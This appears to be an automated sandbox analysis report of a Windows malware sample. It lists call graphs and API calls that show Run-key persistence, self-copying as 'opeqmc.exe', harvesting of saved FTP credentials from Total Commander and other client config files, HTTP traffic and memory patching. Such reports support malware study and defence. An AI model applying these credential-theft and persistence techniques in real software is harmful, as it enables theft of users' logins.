4039ea HeapAlloc 6645->6771 6647 403e00 6650 4033a0 HeapFree 6647->6650 6648 403e0a 6651 40be3a HeapFree 6648->6651 6652 403e08 6650->6652 6651->6652 6663 4040e7 6652->6663 6653 403d18 SHGetFolderPathW 6653->6654 6654->6653 6656 408248 8 API calls 6654->6656 6657 403d88 6654->6657 6660 403df7 6654->6660 6788 4039a3 6654->6788 6656->6654 6658 40848f 7 API calls 6657->6658 6657->6660 6659 403dc8 6658->6659 6659->6660 6661 403dd4 ExpandEnvironmentStringsW 6659->6661 6660->6647 6660->6648 6662 4039a3 8 API calls 6661->6662 6662->6660 6667 404100 6663->6667 6664 40412c SHGetFolderPathW 6664->6667 6665 408248 8 API calls 6665->6667 6666 40416d 6668 404172 6666->6668 6669 40417c 6666->6669 6667->6664 6667->6665 6667->6666 6670 4033a0 HeapFree 6668->6670 6671 40be3a HeapFree 6669->6671 6672 40417a 6670->6672 6671->6672 6673 4041e4 HeapAlloc 6672->6673 6684 404453 6673->6684 6688 404212 6673->6688 6674 4042a0 RegOpenKeyExW 6674->6688 6675 40440f RegEnumKeyExW 6677 404427 RegCloseKey 6675->6677 6675->6688 6676 40443d 6678 40be3a HeapFree 6676->6678 6677->6688 6679 404445 6678->6679 6680 404455 6679->6680 6681 40444b 6679->6681 6683 40be3a HeapFree 6680->6683 6682 4033a0 HeapFree 6681->6682 6682->6684 6683->6684 6691 40451b 6684->6691 6685 40848f 7 API calls 6685->6688 6686 40435e RegOpenKeyExW 6686->6688 6687 40845d 2 API calls 6687->6688 6688->6674 6688->6675 6688->6676 6688->6685 6688->6686 6688->6687 6689 40c3f9 wvnsprintfW 6688->6689 6690 40c00b 3 API calls 6688->6690 6689->6688 6690->6688 6792 40be9d 6691->6792 6693 404535 HeapAlloc 6694 404786 6693->6694 6701 404555 6693->6701 6695 404796 6694->6695 6696 40478c 6694->6696 6698 40be3a HeapFree 6695->6698 6697 4033a0 HeapFree 6696->6697 6699 404794 6697->6699 6698->6699 6711 404a92 6699->6711 6700 4045c5 RegOpenKeyExW 6700->6701 6702 4045e8 RegEnumKeyExW 6700->6702 6701->6700 6703 404780 6701->6703 6704 40476a RegCloseKey 6701->6704 6706 40473d RegEnumKeyExW 6701->6706 6707 40848f 7 API calls 6701->6707 6709 40c3f9 wvnsprintfW 6701->6709 6710 40c00b 3 API calls 6701->6710 6793 40854c RegOpenKeyExW 6701->6793 6702->6701 6705 40be3a HeapFree 6703->6705 6704->6701 6705->6694 6706->6701 6707->6701 6709->6701 6710->6701 6713 404aab 6711->6713 6712 404ad7 SHGetFolderPathW 6712->6713 6713->6712 6714 408248 8 API calls 6713->6714 6715 404b18 6713->6715 6714->6713 6716 404b27 6715->6716 6717 404b1d 6715->6717 6719 40be3a HeapFree 6716->6719 6718 4033a0 HeapFree 6717->6718 6720 404b25 6718->6720 6719->6720 6721 405136 6720->6721 6723 405150 6721->6723 6722 40848f 7 API calls 6722->6723 6723->6722 6724 40520b 6723->6724 6725 4051e0 ExpandEnvironmentStringsW 6723->6725 6727 405211 6724->6727 6728 40521b 6724->6728 6726 404e7b 8 API calls 6725->6726 6726->6723 6729 4033a0 HeapFree 6727->6729 6730 40be3a HeapFree 6728->6730 6731 405219 6729->6731 6730->6731 6732 405229 6731->6732 6733 405238 6732->6733 6734 407b4e 9 API calls 6733->6734 6735 4052e8 6734->6735 6736 406d14 2 API calls 6735->6736 6739 405361 Sleep 6735->6739 6742 405372 6735->6742 6736->6735 6737 40537c Sleep 6737->6742 6739->6735 6740 4053cb Sleep 6740->6742 6741 4053e0 6742->6737 6742->6740 6742->6741 6797 409df4 6742->6797 6744 4084af 6743->6744 6747 4084c5 6743->6747 6761 40845d RegQueryValueExW 6744->6761 6746 403796 6746->6630 6746->6638 6747->6746 6764 40bfd0 6747->6764 6749 408518 6750 40852e 6749->6750 6751 40851f ExpandEnvironmentStringsW 6749->6751 6752 408531 GetProcessHeap HeapFree 6750->6752 6751->6750 6751->6752 6752->6746 6754 4034bc 6753->6754 6755 408248 8 API calls 6754->6755 6756 40350a 6755->6756 6756->6638 6760 4033a4 6757->6760 6758 40be3a HeapFree 6759 4033d7 6758->6759 6759->6636 6760->6758 6762 408482 RegCloseKey 6761->6762 6763 40847f 6761->6763 6762->6747 6763->6762 6765 40bfd7 6764->6765 6766 40bfda 6764->6766 6765->6749 6767 40bff3 6766->6767 6770 40be27 HeapAlloc 6766->6770 6767->6749 6769 40bffa 6769->6749 6770->6769 6772 403a1a GetPrivateProfileStringW 6771->6772 6775 403bb9 PathRemoveFileSpecW 6771->6775 6773 403a36 6772->6773 6784 403baf 6772->6784 6776 403a48 HeapAlloc 6773->6776 6773->6784 6774 40be3a HeapFree 6774->6775 6775->6654 6776->6784 6785 403a64 6776->6785 6777 403ac8 StrStrIW 6778 403add StrStrIW 6777->6778 6777->6785 6779 403af2 GetPrivateProfileStringW 6778->6779 6778->6785 6780 403b09 GetPrivateProfileStringW 6779->6780 6779->6785 6781 403b26 GetPrivateProfileStringW 6780->6781 6780->6785 6781->6785 6782 403ba9 6783 40be3a HeapFree 6782->6783 6783->6784 6784->6774 6785->6777 6785->6782 6786 40c3f9 wvnsprintfW 6785->6786 6787 40c00b 3 API calls 6785->6787 6786->6785 6787->6785 6789 4039b7 6788->6789 6790 408248 8 API calls 6789->6790 6791 4039e5 6790->6791 6791->6654 6792->6693 6794 40856f 6793->6794 6796 408585 6793->6796 6795 40845d 2 API calls 6794->6795 6795->6796 6796->6701 6798 409e01 6797->6798 6810 40beea 6798->6810 6801 409eb1 HttpOpenRequestW 6802 409ead 6801->6802 6803 409ecf HttpSendRequestW 6801->6803 6802->6742 6805 40be3a HeapFree 6803->6805 6806 409eea 6805->6806 6806->6802 6807 409eef InternetReadFile 6806->6807 6807->6802 6808 409f0c 6807->6808 6818 40bf35 6808->6818 6812 40bef4 6810->6812 6822 40beb4 6812->6822 6814 409e3e InternetConnectW 6814->6801 6814->6802 6816 40bf1c 6816->6814 6817 40beb4 WideCharToMultiByte 6816->6817 6817->6814 6819 40bf3a 6818->6819 6820 40bf3f MultiByteToWideChar 6818->6820 6819->6820 6821 40bf58 6820->6821 6821->6802 6823 40bec3 WideCharToMultiByte 6822->6823 6824 40bebe 6822->6824 6825 40bedd 6823->6825 6824->6823 6825->6814 6826 40be27 HeapAlloc 6825->6826 6826->6816 7004 40d2ac 7005 40d2ca 7004->7005 7007 40d378 __except_handler3 7004->7007 7006 40d790 __except_handler3 2 API calls 7005->7006 7009 40d2e5 __except_handler3 __except_handler4 _CallDestructExceptionObject 7006->7009 7008 40d110 __except_handler3 RtlUnwind 7008->7009 7009->7007 7009->7008 7010 402cad 7011 406c77 3 API calls 7010->7011 7012 402cc3 7011->7012 7013 406cb5 GetVersionExW 7012->7013 7014 402cc8 7013->7014 7015 40a8f9 34 API calls 7014->7015 7016 402cdb 7015->7016 7017 40267a 122 API calls 7016->7017 7018 402d00 7017->7018 7019 409c6f SysFreeString 7018->7019 7020 402d08 7019->7020 7021 4032af ExitProcess 7026 402c32 7027 40267a 122 API calls 7026->7027 7028 402c56 7027->7028 7029 409c6f SysFreeString 7028->7029 7030 402c5e 7029->7030 6827 402df3 6828 406c77 3 API calls 6827->6828 6829 402e08 6828->6829 6830 406cb5 GetVersionExW 6829->6830 6831 402e0d 6830->6831 6832 40a8f9 34 API calls 6831->6832 6833 402e20 6832->6833 6834 40267a 122 API calls 6833->6834 6835 402e39 6834->6835 7031 4094b6 7032 4094c9 7031->7032 7033 4094cd 7032->7033 7034 4094f3 CharLowerW CharLowerW 7032->7034 7035 4094e3 SysFreeString 7032->7035 7037 409560 7034->7037 7039 409512 7034->7039 7036 40957e 7035->7036 7038 40956f SysFreeString SysFreeString 7037->7038 7038->7036 7039->7037 7039->7038 7040 40953a CharLowerW 7039->7040 7041 409544 7040->7041 7042 40956a SysFreeString 7041->7042 7042->7038 7043 402db7 7044 40267a 122 API calls 7043->7044 7045 402dd1 7044->7045 7046 40183a 7047 401854 7046->7047 7048 408091 3 API calls 7047->7048 7051 401958 7047->7051 7049 40194a 7048->7049 7050 408091 3 API calls 7049->7050 7050->7051 7054 402e3e 7064 402e4d 7054->7064 7055 40327c 7056 402eb7 GetModuleFileNameW 7057 402ed6 GetCurrentDirectoryW 7056->7057 7056->7064 7057->7064 7058 402f2a GetLastError 7059 40a786 35 API calls 7058->7059 7059->7064 7060 403251 GetLastError 7060->7064 7061 403237 GetLastError 7061->7064 7062 40a786 35 API calls 7062->7064 7063 407552 Sleep 7063->7064 7064->7055 7064->7056 7064->7058 7064->7060 7064->7061 7064->7062 7064->7063 7065 40253c 50 API calls 7064->7065 7065->7064 7077 403bbf 7078 40821c PathCombineW 7077->7078 7079 403bdf 7078->7079 7080 403bf9 7079->7080 7081 403bfe 7079->7081 7082 403bee 7079->7082 7084 4039ea 12 API calls 7081->7084 7083 4039a3 8 API calls 7082->7083 7083->7080 7084->7080

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 121 40abd9-40abf5 call 40ac20 124 40abf7-40ac0c FindFirstFileW 121->124 125 40ac1a 121->125 124->125 126 40ac0e-40ac18 FindClose 124->126 127 40ac1c-40ac1f 125->127 126->127
                          APIs
                            • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,771B0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
                            • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
                          • FindFirstFileW.KERNEL32(?,00000000), ref: 0040AC03
                          • FindClose.KERNEL32(00000000), ref: 0040AC0F
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: FindOpen$CloseFileFirst
                          • String ID:
                          • API String ID: 3155378417-0
                          • Opcode ID: ab3d299b7ad4ae48143099222020c13c56cdbf39ef5f27e8c74799f3a551cc1f
                          • Instruction ID: fa0310e4c65bbc590993533f650c85f5e3ee77ef27cd51fa1c8f473dbf319076
                          • Opcode Fuzzy Hash: ab3d299b7ad4ae48143099222020c13c56cdbf39ef5f27e8c74799f3a551cc1f
                          • Instruction Fuzzy Hash: 5DE0D87160C7044BE220E7B49D0C967B3DCAB45325F000F36A9B6E20C0FA38D46A465F

                          Control-flow Graph

                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B36C
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B39D
                            • Part of subcall function 004069FD: RegCreateKeyExW.ADVAPI32(0040EA48,00000000,00000000,00000000,00000000,00020006,00000000,00000002,0040EA48,?,?,?,?,00406AD3,80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current), ref: 00406A22
                          • GetLastError.KERNEL32(00000004), ref: 0040B3CA
                          • Sleep.KERNEL32(00002710), ref: 0040B3F7
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B413
                          • CopyFileW.KERNEL32(?,?,00000000), ref: 0040B435
                          • ExitProcess.KERNEL32 ref: 0040B44D
                            • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,771B0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
                            • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
                          • GetLastError.KERNEL32(00000004), ref: 0040B48D
                          • GetLastError.KERNEL32(00000004), ref: 0040B49A
                          • ExpandEnvironmentStringsW.KERNEL32(?,00000400), ref: 0040B4C7
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B4D7
                          • GetLastError.KERNEL32(00000004), ref: 0040B500
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$ErrorLastModuleName$Open$CopyCreateEnvironmentExitExpandProcessSleepStrings
                          • String ID: /nomove$IueiOod$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$opeqmc.exe
                          • API String ID: 3692109554-477663111
                          • Opcode ID: 55bb52feb6c62d8aec5773147cbc2c373a20a80f20ddf5eadf9f4fa8ccd6a04a
                          • Instruction ID: ccf8aad4361994264e72a39918ed7d53ff083e628d4a69ee62a5d407c68d8035
                          • Opcode Fuzzy Hash: 55bb52feb6c62d8aec5773147cbc2c373a20a80f20ddf5eadf9f4fa8ccd6a04a
                          • Instruction Fuzzy Hash: 8C4127719042186AE710B7A19D46FAB73ACEF04345F14447BBB05F11C2EB789A548AAF

                          Control-flow Graph

                          APIs
                          • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000400), ref: 004075FC
                          • CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618
                          • GetFileSize.KERNEL32(?,00000000), ref: 0040762E
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407638
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0040763F
                          • ReadFile.KERNELBASE(?,00000000,00000000,?,00000000), ref: 00407660
                          • WriteFile.KERNELBASE(?,?,00000000,?,00000000), ref: 0040767F
                          • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000), ref: 00407691
                          • ReadFile.KERNELBASE(?,?,00000040,?,00000000), ref: 004076A1
                          • SetFilePointer.KERNELBASE(?,?,00000000,00000000), ref: 004076AF
                          • ReadFile.KERNELBASE(?,?,000000F8,?,00000000), ref: 004076C5
                          • SetFilePointer.KERNELBASE(?,?,00000000,00000000), ref: 004076EF
                          • WriteFile.KERNELBASE(?,?,000000F8,?,00000000), ref: 00407705
                          • CloseHandle.KERNELBASE(?), ref: 00407714
                          • CloseHandle.KERNEL32(?), ref: 00407719
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$PointerRead$CloseCreateHandleHeapWrite$AllocateProcessSize
                          • String ID:
                          • API String ID: 2296163861-0
                          • Opcode ID: 894f1e02061cece153af19de11902bbae5fe70548c4ece14d410128547cdf08b
                          • Instruction ID: 7ae3b020874f099f6a4231377d147a855b3f50186be4225f3fece46b7b724b47
                          • Opcode Fuzzy Hash: 894f1e02061cece153af19de11902bbae5fe70548c4ece14d410128547cdf08b
                          • Instruction Fuzzy Hash: F0416A71901028BADB209BA2DD48EEFBF7DEF45390F104476F619F21A0D7709A10DB64

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 73 40ac20-40ac48 RegOpenKeyExW 74 40ac60-40ac76 RegOpenKeyExW 73->74 75 40ac4a-40ac55 call 4069c0 73->75 76 40ac78-40ac7a 74->76 77 40ac7c-40ac87 call 4069c0 74->77 81 40ac5a-40ac5e 75->81 79 40ac8e-40ac92 76->79 82 40ac8c-40ac8d 77->82 81->74 81->79 82->79
                          APIs
                          • RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,771B0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
                          • RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
                            • Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                            • Part of subcall function 004069C0: RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Open$CloseQueryValue
                          • String ID: /nomove$IueiOod$SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                          • API String ID: 3546245721-4228964922
                          • Opcode ID: e183a9483fa9f7ba9bb43204af9f8e84b77f88267b9ccf7be8296576afd26502
                          • Instruction ID: 3bac8edf5f415b784fe4546894dc74dc09b9405a13c640cee1cd261e7a9a2bb6
                          • Opcode Fuzzy Hash: e183a9483fa9f7ba9bb43204af9f8e84b77f88267b9ccf7be8296576afd26502
                          • Instruction Fuzzy Hash: 5F01867265430EFEFF1096919D42F9A736CDB40768F210036FA00B60D1D6B6AE155779

                          Control-flow Graph

                          APIs
                          • GetCommandLineW.KERNEL32(?,0040B3E5), ref: 0040AB0A
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000820,00000400,?,0040B3E5), ref: 0040AB44
                          • CharLowerW.USER32(?,?,0040B3E5), ref: 0040AB57
                          • CharLowerW.USER32(?,?,0040B3E5), ref: 0040AB60
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CharLower$CommandFileLineModuleName
                          • String ID: /nomove
                          • API String ID: 1338073227-1111986840
                          • Opcode ID: 00c7a09b5e38cd9dc17e43fc8aab8f350de87f2bf6048177a511846302a86bad
                          • Instruction ID: b8029fc6669f79c45f6caaa8ce38406425976cf3cabd4088da44db58d281c6d8
                          • Opcode Fuzzy Hash: 00c7a09b5e38cd9dc17e43fc8aab8f350de87f2bf6048177a511846302a86bad
                          • Instruction Fuzzy Hash: 7CF01D7290022956DB10A7B19C05BDB72ACFF40309F0445B6AA05F2180ED78EA548F95

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 96 407727-407751 call 40d5b0 GetModuleFileNameW 99 407753-40776b call 4075d4 96->99 100 40776d-40776e 96->100 105 4077e1-4077ea 99->105 102 407774-407797 ExpandEnvironmentStringsW call 4075d4 100->102 106 40779c-4077a0 102->106 107 4077a2-4077a5 106->107 108 4077eb-4077ee 106->108 110 4077b7-4077ba 107->110 111 4077a7-4077b5 GetLastError 107->111 109 4077e0 108->109 109->105 112 4077d2-4077dc 110->112 113 4077bc-4077c8 GetLastError 110->113 114 4077ca-4077cf call 40a786 111->114 112->102 116 4077de 112->116 113->114 114->112 116->109
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400,771B0900,00000400,00000000,0040B4B3,00000000), ref: 00407744
                          • ExpandEnvironmentStringsW.KERNEL32(?,00000400), ref: 00407784
                          • GetLastError.KERNEL32(00000004), ref: 004077A9
                            • Part of subcall function 004075D4: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000400), ref: 004075FC
                            • Part of subcall function 004075D4: CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$Create$EnvironmentErrorExpandLastModuleNameStrings
                          • String ID:
                          • API String ID: 1536607067-0
                          • Opcode ID: eafcbf4a8c3930913d522f5c7b72beb30a71f0d0c1af5e3f4189f884763461bb
                          • Instruction ID: de8f4f1c442ba604be96c6aabbb627c7d922d162aa2fadd5385f895ae0141ebd
                          • Opcode Fuzzy Hash: eafcbf4a8c3930913d522f5c7b72beb30a71f0d0c1af5e3f4189f884763461bb
                          • Instruction Fuzzy Hash: AD11E972908249AED720D7A19C81FEB739CFB44354F10483BFB95E30D0E678B945866B

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 118 4077f0-407829 call 40d530 CreateProcessW
                          APIs
                          • _memset.LIBCMT ref: 00407800
                          • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,?,?,?,?,00000400), ref: 0040781B
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CreateProcess_memset
                          • String ID:
                          • API String ID: 1177741608-0
                          • Opcode ID: 0cd9a43e4f1b4c0064b4bee2692f9063eedacf03e95d61430481666f95000588
                          • Instruction ID: 3694313203bda926a09df6f19e1a61ce713b6a49f930e6e3ed03be73a1123fdc
                          • Opcode Fuzzy Hash: 0cd9a43e4f1b4c0064b4bee2692f9063eedacf03e95d61430481666f95000588
                          • Instruction Fuzzy Hash: 1DE048B294113876DB20A6E69C0DDDF7F6CDF06694F000121BA0EE50C4E5749608C6F5

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 128 4069c0-4069fc RegQueryValueExW RegCloseKey
                          APIs
                          • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                          • RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CloseQueryValue
                          • String ID:
                          • API String ID: 3356406503-0
                          • Opcode ID: 149707b6f704b0206dcd429f7e61dcdc4ff4cc903c0dfabc6e5b0404234ae6db
                          • Instruction ID: 7cb27e63b8b96f7a1a34dd7d249ffcc2d4336ce0f7aa5f451266b78b49120899
                          • Opcode Fuzzy Hash: 149707b6f704b0206dcd429f7e61dcdc4ff4cc903c0dfabc6e5b0404234ae6db
                          • Instruction Fuzzy Hash: DCE06D7A000208BBEF104F94CD09BD97BB9EB44358F208464BA00A6150D67596149B14

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 129 4039ea-403a14 HeapAlloc 130 403bba-403bbe 129->130 131 403a1a-403a30 GetPrivateProfileStringW 129->131 132 403bb3-403bb9 call 40be3a 131->132 133 403a36-403a42 call 40c475 131->133 132->130 133->132 138 403a48-403a5e HeapAlloc 133->138 138->132 139 403a64-403ac3 call 405511 * 5 138->139 150 403ac8-403ad7 StrStrIW 139->150 151 403b93-403ba3 call 40c495 150->151 152 403add-403aec StrStrIW 150->152 151->150 158 403ba9-403bb2 call 40be3a 151->158 152->151 153 403af2-403b03 GetPrivateProfileStringW 152->153 153->151 155 403b09-403b24 GetPrivateProfileStringW 153->155 155->151 157 403b26-403b3a GetPrivateProfileStringW 155->157 157->151 159 403b3c-403b47 call 403877 157->159 158->132 159->151 164 403b49-403b7b call 405511 call 40c3f9 159->164 169 403b90 164->169 170 403b7d-403b8b call 40c00b 164->170 169->151 170->169 173 403b8d 170->173 173->169
                          APIs
                          • HeapAlloc.KERNEL32(00000008,00020002,?,00000104,SOFTWARE\Ghisler\Total Commander), ref: 00403A09
                          • GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00403A2C
                          • HeapAlloc.KERNEL32(00000008,00000C0C), ref: 00403A55
                          • StrStrIW.SHLWAPI(?,?), ref: 00403ACF
                          • StrStrIW.SHLWAPI(?,?), ref: 00403AE4
                          • GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403AFF
                          • GetPrivateProfileStringW.KERNEL32(?,?,00000000,000001FE,000000FF,?), ref: 00403B20
                          • GetPrivateProfileStringW.KERNEL32(?,?,00000000,?,000000FF,?), ref: 00403B36
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: PrivateProfileString$AllocHeap
                          • String ID: SOFTWARE\Ghisler\Total Commander$connections$default$ftp://%s:%s@%s$host$password$username
                          • API String ID: 2479592106-2015850556
                          • Opcode ID: c368ffed181334e4a999fe46bdaddc7fa5d9e929cd71afacdc90b45fbd8a1971
                          • Instruction ID: 106d3b010c48b16868dcb071ba678aa04ac33b338b72d514ced31169f03d36dc
                          • Opcode Fuzzy Hash: c368ffed181334e4a999fe46bdaddc7fa5d9e929cd71afacdc90b45fbd8a1971
                          • Instruction Fuzzy Hash: A2513D71900109BAEB11EFA5DD41EAEBBBDEF44308F204077E904F6292D775AF068B58

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00406A68: RegOpenKeyExW.ADVAPI32(80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current,00000000,00000001,?,00420840,?,00000000), ref: 00406A8C
                            • Part of subcall function 00406ADF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00420840,?,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182), ref: 00406B2A
                          • GetSystemMetrics.USER32(00000000), ref: 004032E5
                          • GetSystemMetrics.USER32(00000001), ref: 004032ED
                          • VirtualProtect.KERNEL32(75A90B80,0000000A,00000008,?,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403309
                          • VirtualProtect.KERNEL32(75A90B88,0000000A,?,?,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403333
                          • SetUnhandledExceptionFilter.KERNEL32(004032AF,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 0040333A
                          • LoadLibraryW.KERNEL32(atl,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403345
                          • GetProcAddress.KERNEL32(00000000,AtlAxWinInit), ref: 0040335D
                          • GetProcAddress.KERNEL32(00000000,AtlAxAttachControl), ref: 0040336A
                          • GetProcAddress.KERNEL32(00000000,AtlAxGetControl), ref: 00403377
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressProc$MetricsOpenProtectSystemVirtual$ExceptionFilterLibraryLoadUnhandled
                          • String ID: AtlAxAttachControl$AtlAxGetControl$AtlAxWinInit$atl
                          • API String ID: 3066332896-2664446222
                          • Opcode ID: fe1f50a485c472adffca313bd216073f3c2af1e46121dbe202f23b587a8dcd22
                          • Instruction ID: 61d9a237d914756188f526d52bf2e891562662c8e4878cb3977fb5d3c9d5a9bd
                          • Opcode Fuzzy Hash: fe1f50a485c472adffca313bd216073f3c2af1e46121dbe202f23b587a8dcd22
                          • Instruction Fuzzy Hash: E6212771900390EED3019FBAAD84A5A7FE8EB5B31171545BBE556F32A0C7B80902CB79
                          APIs
                            • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C
                          • HeapAlloc.KERNEL32(00000008,00020002), ref: 00403566
                          • GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 0040358A
                          • HeapAlloc.KERNEL32(00000008,00000C20), ref: 004035B5
                          • GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403639
                          • GetPrivateProfileIntW.KERNEL32(?,?,00000015,?), ref: 00403653
                          • GetPrivateProfileStringW.KERNEL32(?,?,00000000,-000001FE,000000FF,?), ref: 00403681
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: PrivateProfile$String$AllocHeap$CombinePath
                          • String ID: ftp://%s:%s@%s:%u$pass$port$user
                          • API String ID: 3432043379-2696999094
                          • Opcode ID: 44b7e08f2b4d95bd69ae67f2fadcfc6b29273b9b05256415c6f2e19ab8e382dd
                          • Instruction ID: ca29095f8650abd3188745a74e72d347e34b1f07fc40ddfd65b33f15b90f053b
                          • Opcode Fuzzy Hash: 44b7e08f2b4d95bd69ae67f2fadcfc6b29273b9b05256415c6f2e19ab8e382dd
                          • Instruction Fuzzy Hash: D3515FB2104606AFE710EF61DC81EABBBEDEB88304F10493BF554A32D1D735DA058B56
                          APIs
